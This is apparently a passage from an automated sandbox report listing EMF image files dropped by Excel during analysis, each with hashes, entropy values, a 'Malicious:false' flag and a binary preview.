          Preview:3.7.4.6.3.7.6.,.1.1.9.6.3.7.8.,.1.7.8.8.6.5.8.,.2.5.5.0.5.0.8.8.,.1.2.5.,.1.1.9.,.3.0.0.4.9.2.6.8.,.3.7.4.6.2.5.9.,.1.2.2.3.4.3.4.,.3.7.4.6.2.6.5.,.3.7.4.6.2.5.8.,.;.3.2.9.4.5.8.7.9.9.,.3.7.4.6.3.7.8.,.6.3.6.4.3.3.4.,.3.0.1.5.3.7.2.1.,.2.3.7.1.6.5.1.,.6.5.4.0.2.1.5.,.2.4.6.0.9.2.5.8.,.4.0.6.9.3.5.8.2.,.1.0.4.9.5.2.3.4.,.6.3.6.4.3.1.8.,.3.0.1.2.3.4.6.6.,.2.7.1.5.3.4.9.7.,.6.3.7.1.6.9.4.,.8.7.4.7.0.1.5.3.,.5.9.2.2.3.4.2.3.,.5.7.9.9.9.6.6.1.,.1.5.6.1.9.5.8.,.6.3.0.6.3.0.9.9.,.2.7.3.6.0.0.9.5.,.5.8.4.2.5.8.6.0.,.6.3.6.4.3.3.7.,.6.1.7.0.7.3.0.7.,.6.3.6.4.3.3.0.,.6.3.6.4.3.3.1.,.6.7.4.8.3.9.6.1.4.,.3.3.7.9.1.6.2.,.4.7.3.8.2.9.4.8.,.1.6.5.7.4.5.3.,.1.0.6.9.5.5.2.,.1.6.5.7.4.5.2.,.5.2.9.1.0.0.0.0.,.1.3.5.2.5.8.6.,.1.3.5.2.5.8.7.,.1.7.7.1.6.5.7.,.1.0.2.3.8.6.4.,.1.0.2.3.6.3.8.,.6.3.7.1.6.9.5.,.4.8.1.9.5.5.3.8.,.1.4.6.1.9.5.3.,.6.3.6.4.3.3.2.,.3.2.0.5.9.2.7.6.7.,.3.7.4.6.3.7.9.,.1.9.8.4.4.3.5.,.3.1.4.1.5.9.2.0.,.6.1.7.0.7.3.0.5.,.
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):149960
          Entropy (8bit):2.809147931560311
          Encrypted:false
          SSDEEP:1536:5YP0HrktaaDNi1ENUAI8DHW/97p8/JYbhaEUbNADn7:Akz7
          MD5:266F972C1475966723D7C22B907DE62F
          SHA1:B168A7A4DD6C4B22588833E8855B35054156EFCB
          SHA-256:98347D69389564559F0539F1D2966402C195B24EB9E4EA3EAB919EF2F6902FC1
          SHA-512:A3424395964FBC966114FA957065F4CBDD39E8BFE9530AE9C6B51CFF77FAD7432445BFB52DB1116A8C3CFE5A42C10EEC3EF315617A383F53CEC9B4028D7C152D
          Malicious:false
          Preview:....l...........................Z....G.. EMF.....I..............................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................R...p...................................T.i.m.e.s. .N.e.w. .R.o.m.a.n.....................................o....v........P]............`A....(.......0....@c..Bc............. \o...v0...........9...0...L....\o..X@l.....\o.D.#
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):13372
          Entropy (8bit):2.6297308578148604
          Encrypted:false
          SSDEEP:96:Xgk+uue2qvSHZ35HNUSG3+LB3mzlkMmpJPJ0HWSj0T84b4IjV:r2XZjnGEmmMFj0DbN
          MD5:390A655C493DFAA81866EB0E2064209D
          SHA1:57808EFD439D6FB8F6ECA342CE44141AB7C9E57A
          SHA-256:F1A1D4712D5B4C1E93BE4F1B3E12F5BDE53258AF31726B2499665119B210D351
          SHA-512:433D26823E62F7CA6EFFB160D2B3A36B2BE1B68A07A64D5E5EA96B47BF5897477046795424440A0CF6858B83E7661030C0D828A946528A62D02D9468A43421E9
          Malicious:false
          Preview:....l...........................|,..\... EMF....<4..O...........................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................R...p.................................. C.a.l.i.b.r.i........................................................k.u.[o..D.u........NAI..[o./D...[o..U.. ]o.T^o............@....... ]o............ .f....N L....\o..X@l....._o.....
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):98872
          Entropy (8bit):2.6178818363212457
          Encrypted:false
          SSDEEP:768:XOWofMxW3CdIvgmKpIgAB1DW7ohBb66mQK4BTonxqQbApQKyE:+WoMxW3CJmK2gANQE
          MD5:9F0F469F34964F3CA59E0176421AFEDC
          SHA1:A650268F58B7A3E423BA5EFE9754702566800EEC
          SHA-256:AE8386A9EA5245F7698259D86C52CEA26F1295A89FE07A9A5A451C0E3D43B093
          SHA-512:87FEFBF247874DD7BF6198A4827010377094508C5D23483F8AA603E513D22C2C66EDC120800E43227349974753931427E2A2ABEE9F2567CADFECBF45C1A9C96C
          Malicious:false
          Preview:....l............................}...... EMF....8...g...........................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...................................L...d...............!...............)...!..............?...........?................................L...d...E...............E...............!..............?........
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):13372
          Entropy (8bit):2.503088389753023
          Encrypted:false
          SSDEEP:96:Xgk+uuOT5LS6vSf6bHKTSG3+LB3mzlPKGKwpJPJ0HWSj0T84b4IjV:3d7KOGEmBjKbj0DbN
          MD5:84CB2AB981449EF9397BE78A0941275F
          SHA1:8067BD9516B0F4531A3B6B77D3630DDA30111300
          SHA-256:D25FAF004AE0A15073665D48059395F366C0911CB36D292F10308804E21A2E9E
          SHA-512:C2AB0A83D8AD6D9742387B578ABA255EBEA593D212960D7B0CE9DF68DAC3892D4198BCC31C94E65E6630881E45EFB2C1719A65551987184869C3998CCF10E0EC
          Malicious:false
          Preview:....l...........................|,..\... EMF....<4..O...........................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................R...p.................................. C.a.l.i.b.r.i.....................................................4B..4B....T.n.T.n........................./......H.G....../.........x.n.............................X.....n..X@l....
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):8184
          Entropy (8bit):2.4289254449475277
          Encrypted:false
          SSDEEP:96:EV5g2s88nDHlgaX9VoI5i9AWZBKlA+B79YIRdMZgmR7qii1BoFV:EaHOaXtBWZ4F79RdGgmR7qii1BY
          MD5:76F7CFF5327422B48780C2A0B17F3C2D
          SHA1:167AC9AFA53E67757988688EDE17165B83B925C4
          SHA-256:DEFF5D57F7CCAC0F65F5A098F7284EE10311201A35510230C55DA338C69EAF1C
          SHA-512:7648AD534AECBD72C6DF8F6BD729D8DEB0FE433AB8FD651F45951FF2C5C6A687CEA73C434E16DC195B23E59D16D802C3BDB1CA0182AF8457225184E41B5F2831
          Malicious:false
          Preview:....l...........{...U............A...... EMF....................................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!...............................................|...V...K..............."...........!...............................................|...V..."...........!...............................................|...V..."...........!...............................................|...V..."...........!...............................................|...V...'.......................%...................................L...d...h...............h.......X.......!..............?...........?................................R...p...................................A.r.i.a.l...............
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):98872
          Entropy (8bit):2.6178818363212457
          Encrypted:false
          SSDEEP:768:XOWofMxW3CdIvgmKpIgAB1DW7ohBb66mQK4BTonxqQbApQKyE:+WoMxW3CJmK2gANQE
          MD5:9F0F469F34964F3CA59E0176421AFEDC
          SHA1:A650268F58B7A3E423BA5EFE9754702566800EEC
          SHA-256:AE8386A9EA5245F7698259D86C52CEA26F1295A89FE07A9A5A451C0E3D43B093
          SHA-512:87FEFBF247874DD7BF6198A4827010377094508C5D23483F8AA603E513D22C2C66EDC120800E43227349974753931427E2A2ABEE9F2567CADFECBF45C1A9C96C
          Malicious:false
          Preview:....l............................}...... EMF....8...g...........................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...................................L...d...............!...............)...!..............?...........?................................L...d...E...............E...............!..............?........
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):13444
          Entropy (8bit):2.6262120804139126
          Encrypted:false
          SSDEEP:96:tgk+uue2qvSHZH5HNUSG3+LB3mzlkM2pJPJ0HWSj0T84b4IjV:92XZTnGEmmM1j0DbN
          MD5:DF49EEDF21DE26D300A84FE97FC07B6F
          SHA1:56D5DFAFF52F4E2B2B48796F0FA196C56B8DFF7D
          SHA-256:F5405F861836FBA393B9C85E26EF670E3B0444E8B55D0E0CF437539B4E903D93
          SHA-512:30B4998658C2406C9811CD8C2240120DDD2A8195C83DC7083DEA08F6BBA9DF6243CB3F685FB43BF073173FBAC3F464ADF5C786C6C3B09C0A3849596DB8ED3FA7
          Malicious:false
          Preview:....l...........................|,..\... EMF.....4..U...........................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................R...p.................................. C.a.l.i.b.r.i........................................................k.u.[o..D.u........NAI..[o./D...[o..U.. ]o.T^o............@....... ]o............ .f....N L....\o..X@l....._o.....
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):8084
          Entropy (8bit):2.5551694039574895
          Encrypted:false
          SSDEEP:96:j+RiOO++Z39FAcRwxBdEtzBfCC7Boff8oBJ6ANQ4HJV:jtGNOzBArH
          MD5:721E8AAC81F0A6D4659831CB8194D668
          SHA1:6BE0CEFAEC9F0B1EAD9DE03C8D4679767CF8B549
          SHA-256:E52DF310BB20C42F738A3C8E03ED4110CB795B8A07AE5D4E474EA075564B1622
          SHA-512:24CACEED3153493E34988C35628FAA2C198C9B13AFDD8ABC214EFBA0ACCD0579BADCD5EB0F76F5BDA16D3A279DB4DF4BB218ABD5FFD751C6E62676BD1AAEF2E7
          Malicious:false
          Preview:....l.........../...n............9...... EMF................................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................0...o..."...........!...............................................0...o..."...........!...............................................0...o..."...........!...............................................0...o..."...........!...............................................0...o...'.......................%...........................................................L...d...........>...............q.......!..............?...........?................................R...p...................................A.r.i.a.l...............................................
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):99352
          Entropy (8bit):2.6626209635948763
          Encrypted:false
          SSDEEP:768:hOjDM8vsewi1DW7ohBb66mQK4BTonxqQbApQKyE:UPXwwQE
          MD5:9EA0B8C3E35DAB2A3BE3C2E7FF6D9EE8
          SHA1:0D36BE4ED3B6D8D1EF2CAD4CCEF33D3CB6A0B18D
          SHA-256:82FA6CB22FD62BFF2E3BAFB61097776C5818FD6D12A24A910C3997FAA25BDE97
          SHA-512:A3C9EF1225BFCB15E59F4365DEFB36AC3C1DBE51762F99826995736A6C51A6A73BDEED7856D855C6DAE7B5933A7F36C5B350045ABD4F3192488EDB989ECA8DB0
          Malicious:false
          Preview:....l............................}...... EMF....................................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...................................L...d...............!...............)...!..............?...........?................................L...d...E...............E...............!..............?........
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):8184
          Entropy (8bit):2.4289254449475277
          Encrypted:false
          SSDEEP:96:EV5g2s88nDHlgaX9VoI5i9AWZBKlA+B79YIRdMZgmR7qii1BoFV:EaHOaXtBWZ4F79RdGgmR7qii1BY
          MD5:76F7CFF5327422B48780C2A0B17F3C2D
          SHA1:167AC9AFA53E67757988688EDE17165B83B925C4
          SHA-256:DEFF5D57F7CCAC0F65F5A098F7284EE10311201A35510230C55DA338C69EAF1C
          SHA-512:7648AD534AECBD72C6DF8F6BD729D8DEB0FE433AB8FD651F45951FF2C5C6A687CEA73C434E16DC195B23E59D16D802C3BDB1CA0182AF8457225184E41B5F2831
          Malicious:false
          Preview:....l...........{...U............A...... EMF....................................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!...............................................|...V...K..............."...........!...............................................|...V..."...........!...............................................|...V..."...........!...............................................|...V..."...........!...............................................|...V...'.......................%...................................L...d...h...............h.......X.......!..............?...........?................................R...p...................................A.r.i.a.l...............
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):44256
          Entropy (8bit):3.15066292565687
          Encrypted:false
          SSDEEP:384:IhpMW5NFNimpUIuOjwTsiyGGiugBhUErpxTORe4tyIWY5:BWzi+8+GGidBhUErpxTORe4tyI9
          MD5:F1EC2E98B0F577B675156B13DCF94105
          SHA1:4FF2D02051E92771FBB245BA8095C80148A0F61A
          SHA-256:66AFB9C12E20A08F9A713C366EDE8A9CD8F4A93B7D7BFC76205013C28A3250E9
          SHA-512:6E442DB49BF2A429AD2CA7CB3804D79791C1E1FEB414F69FDDD58042E98C5AA5BFC1C751713DB76DD58DC9F3CAC3A7C491228797A909F8FD0291048E8F2FC9BE
          Malicious:false
          Preview:....l................................ .. EMF...............................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...........................m...-...!..............?...........?................................R...p.................................. A.r.i.a.l...............................................
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):13372
          Entropy (8bit):2.503088389753023
          Encrypted:false
          SSDEEP:96:Xgk+uuOT5LS6vSf6bHKTSG3+LB3mzlPKGKwpJPJ0HWSj0T84b4IjV:3d7KOGEmBjKbj0DbN
          MD5:84CB2AB981449EF9397BE78A0941275F
          SHA1:8067BD9516B0F4531A3B6B77D3630DDA30111300
          SHA-256:D25FAF004AE0A15073665D48059395F366C0911CB36D292F10308804E21A2E9E
          SHA-512:C2AB0A83D8AD6D9742387B578ABA255EBEA593D212960D7B0CE9DF68DAC3892D4198BCC31C94E65E6630881E45EFB2C1719A65551987184869C3998CCF10E0EC
          Malicious:false
          Preview:....l...........................|,..\... EMF....<4..O...........................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................R...p.................................. C.a.l.i.b.r.i.....................................................4B..4B....T.n.T.n........................./......H.G....../.........x.n.............................X.....n..X@l....
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):44256
          Entropy (8bit):3.147465798679962
          Encrypted:false
          SSDEEP:384:j1W5NF0vUXfOjwTsiyGGiugBhUErpxTORe4tyJ2c:ZWYW+GGidBhUErpxTORe4ty5
          MD5:36D8FF25D14E7E2FBB1968E952FF9C17
          SHA1:E3BD7140DA6CAD87C5A1D5417DFBDD7B0E67B110
          SHA-256:305DCBFBEB9FFEE587E061D779CA1DDF31939ECD64EEE7D8A22BA9D640B48633
          SHA-512:B4B753222F617F78B36949BD9F37E13D68D9FD7367484BEE799F0D7AE38E1705E997A6409251BC2B9830012536FBD08C3C6CB7411D9122F939833F38E303DCBF
          Malicious:false
          Preview:....l................................ .. EMF...............................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...........................m...-...!..............?...........?................................R...p.................................. A.r.i.a.l...............................................
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):8184
          Entropy (8bit):2.5013423844740186
          Encrypted:false
          SSDEEP:96:EV5g2s88nDfX1vgA/O5i9HWZBKlA+B79YIRdMZgmR7qii1BoFV:EaNYj2WZ4F79RdGgmR7qii1BY
          MD5:10475447EA1A8F74CE72EDD6610711B4
          SHA1:CA36E79CECAA47FA6EFF078E17B7CA03468BD9BD
          SHA-256:51F504993F447EC0DA3D27959639EE10E65937BDB2666BB0F93D0BF159E4A65B
          SHA-512:A1AA027B5FA507D0819F89FB76527297B223F7C3FC258B44073174D7624D06697F2A27E2456926772E1092071D04FA19A595746A64AD443341AF9FD45369777E
          Malicious:false
          Preview:....l...........{...U............A...... EMF....................................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!...............................................|...V...K..............."...........!...............................................|...V..."...........!...............................................|...V..."...........!...............................................|...V..."...........!...............................................|...V...'.......................%...................................L...d...h...............h.......X.......!..............?...........?................................R...p...................................A.r.i.a.l...............
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):134544
          Entropy (8bit):2.9527588414114754
          Encrypted:false
          SSDEEP:768:P0WYNNkN2HtS1u40TiTKAvGNLnvfKx4t1cEU9W3V/DOEsx:pYN/Ni0TiTKeYjfKx4tCEU9W35psx
          MD5:83F48FDD46D3424E92E24E709EAB5960
          SHA1:6CEE65663B48B56BDFF6756C38C1F4190EAC6E12
          SHA-256:77F4BCE7FBE1E2F98A04DC51994467460B255135535CDE954EEE8180F500C6AE
          SHA-512:8F781049001FC063EDB9B4352C0EA05D8DA9DCFC599234A58258C6FB4C4CED2B862A701081F10B68E286124413AD04F4AAAB485D376B0A2FB04167AFF121F47E
          Malicious:false
          Preview:....l...............e............n...=.. EMF........6.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!.............................................../...f..."...........!.............................................../...f..."...........!.............................................../...f..."...........!.............................................../...f..."...........!.............................................../...f...R...p...................................T.i.m.e.s. .N.e.w. .R.o.m.a.n........................................................@...............8/....X.....8/........................X...................N.8/@....y8/.....m8/|...............|.....................8/.................8/
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):98872
          Entropy (8bit):2.6178818363212457
          Encrypted:false
          SSDEEP:768:XOWofMxW3CdIvgmKpIgAB1DW7ohBb66mQK4BTonxqQbApQKyE:+WoMxW3CJmK2gANQE
          MD5:9F0F469F34964F3CA59E0176421AFEDC
          SHA1:A650268F58B7A3E423BA5EFE9754702566800EEC
          SHA-256:AE8386A9EA5245F7698259D86C52CEA26F1295A89FE07A9A5A451C0E3D43B093
          SHA-512:87FEFBF247874DD7BF6198A4827010377094508C5D23483F8AA603E513D22C2C66EDC120800E43227349974753931427E2A2ABEE9F2567CADFECBF45C1A9C96C
          Malicious:false
          Preview:....l............................}...... EMF....8...g...........................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...................................L...d...............!...............)...!..............?...........?................................L...d...E...............E...............!..............?........
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):153132
          Entropy (8bit):2.7989721466737993
          Encrypted:false
          SSDEEP:1536:osnMAjSUbP8tV6XkRMamXUv6INHOqXbk0WYqEkRvvK:osnPSG8t5gK
          MD5:AEFDFC804B62072421A576D899ECF67D
          SHA1:140011AB7937A77B187959A94286B8DFE7FC2FC3
          SHA-256:DAF38CC675CF9F1D53EACDB46322F9F5D056524FA8097A23C82C75CAA2802DCF
          SHA-512:C7536786783584998DA834A46607A5314E1D151DC3B52541A93C19AB6E1BB4651E76E5F0EFE6EB36E93E3B2A514035927E8E512DC806D696447309A4B8FE75DB
          Malicious:false
          Preview:....l...........................Z....G.. EMF....,V..............................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...................................&...........................%...........................6.......#.......&...........................%...........L...d...........".......................!...........
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):153132
          Entropy (8bit):2.7989721466737993
          Encrypted:false
          SSDEEP:1536:osnMAjSUbP8tV6XkRMamXUv6INHOqXbk0WYqEkRvvK:osnPSG8t5gK
          MD5:AEFDFC804B62072421A576D899ECF67D
          SHA1:140011AB7937A77B187959A94286B8DFE7FC2FC3
          SHA-256:DAF38CC675CF9F1D53EACDB46322F9F5D056524FA8097A23C82C75CAA2802DCF
          SHA-512:C7536786783584998DA834A46607A5314E1D151DC3B52541A93C19AB6E1BB4651E76E5F0EFE6EB36E93E3B2A514035927E8E512DC806D696447309A4B8FE75DB
          Malicious:false
          Preview:....l...........................Z....G.. EMF....,V..............................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...................................&...........................%...........................6.......#.......&...........................%...........L...d...........".......................!...........
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):109544
          Entropy (8bit):4.282675970330063
          Encrypted:false
          SSDEEP:768:I4KlWqWxZiDQ4hHdCUeHxCDJB9Cnh3KCg0F9BV:I42WxF4MyeKCV
          MD5:F7B9A8F20E64B2CB6B572BCBA5866236
          SHA1:2F092A0A518639332BE76BF60DBB966AC331D356
          SHA-256:72447B22A4BBC05B9E9183DF2ADB712AB51C3A45C6247C2303024197D1623F57
          SHA-512:4A78624A9EB02208F3F30D03CC53EBE00BDD2C59E8F7719E35E706D51CD2F8D0D330BE6D6FAD2A9652536F888CB99E0CBE1E3B97A05EA65CB5914C37C501B728
          Malicious:false
          Preview:....l...............r............C...a.. EMF...............................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................s..."...........!...................................................s..."...........!...................................................s..."...........!...................................................s..."...........!...................................................s...'...............ZZZ.....%...................ZZZ.....................................L...d...............p...............q...!..............?...........?................................'...............2.......%...........(...................2...L...d.......p...............p.......
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):150296
          Entropy (8bit):2.799142432816747
          Encrypted:false
          SSDEEP:1536:79vUZ5i5jyrai1ENUAI8DHW/97p8/JYbhaEUbNcuI:Id2I
          MD5:A93F5E50E31783F813DB79E618E0D62C
          SHA1:9591317198A5DAC768054212F37AAA5B2818799A
          SHA-256:CB51AF439DBC38DDCF55938AC4D90F346005C45CC5C076F3314C39892085FE99
          SHA-512:9665B7ABF383371768C2A9DB2D4C783E8C9BBF60E86D164291B146168B766DEA4D1D3885F07EFC41871785AB522419315AD7E51E2A05F736828043EEC00FA0AA
          Malicious:false
          Preview:....l...........................Z....G.. EMF.....K..............................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................R...p...................................T.i.m.e.s. .N.e.w. .R.o.m.a.n.....................................o....v........P]............`A....(.......0....@c..Bc............. \o...v0...........9...0...L....\o..X@l.....\o.D.#
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):98872
          Entropy (8bit):2.666175184746513
          Encrypted:false
          SSDEEP:768:XOTDfLvr+wS1DW7ohBb66mQK4BTonxqQbApQKyE:+fGwAQE
          MD5:F5B3BD07FE610C086CC42D496A2A95DC
          SHA1:7A72689AE11E1E4291304BAB96EF9E5A9ECA1345
          SHA-256:3E11F4ADEF6CDB275A71FE8E276B011A5394413692DD2FD126004662E6FD92B4
          SHA-512:CC3EDB0C1424433383D56A92F542D7632C98457423CDD909A18BBE7D15DFA6C40B9AB71978A96ACDEA8DAA2C122841F35BAF7208A6EFB85B9B58CBD188EF6183
          Malicious:false
          Preview:....l............................}...... EMF....8...g...........................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...................................L...d...............!...............)...!..............?...........?................................L...d...E...............E...............!..............?........
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):8208
          Entropy (8bit):2.496765754920934
          Encrypted:false
          SSDEEP:96:Eeg2s88nDfX1vg0I5N9OWZBKlA+B79YIRdMZgmR7qii1BoFV:E/NYdCWZ4F79RdGgmR7qii1BY
          MD5:75A0E8F3C21F582D4CC79BE3F3261262
          SHA1:2D744098E3189633474E8B27BE9633F268AA4FCB
          SHA-256:DC41BBC463827C3DA36973D2F96EAE3A01DD6B252C8BC5D7C038FED10878DFF0
          SHA-512:0E26C9B9B8BA4E011DE351303CA87D1EBC35A27E6B07E3499F868FC5D5C5E338AEAB2848D396E8F852E02E239E269AFC332C96D6B1414AA63E6FDE12D9562457
          Malicious:false
          Preview:....l...........{...U............A...... EMF..... ..............................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!...............................................|...V...K..............."...........!...............................................|...V..."...........!...............................................|...V..."...........!...............................................|...V..."...........!...............................................|...V...'.......................%...................................L...d...h...............h.......X.......!..............?...........?................................R...p...................................A.r.i.a.l...............
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):13372
          Entropy (8bit):2.503088389753023
          Encrypted:false
          SSDEEP:96:Xgk+uuOT5LS6vSf6bHKTSG3+LB3mzlPKGKwpJPJ0HWSj0T84b4IjV:3d7KOGEmBjKbj0DbN
          MD5:84CB2AB981449EF9397BE78A0941275F
          SHA1:8067BD9516B0F4531A3B6B77D3630DDA30111300
          SHA-256:D25FAF004AE0A15073665D48059395F366C0911CB36D292F10308804E21A2E9E
          SHA-512:C2AB0A83D8AD6D9742387B578ABA255EBEA593D212960D7B0CE9DF68DAC3892D4198BCC31C94E65E6630881E45EFB2C1719A65551987184869C3998CCF10E0EC
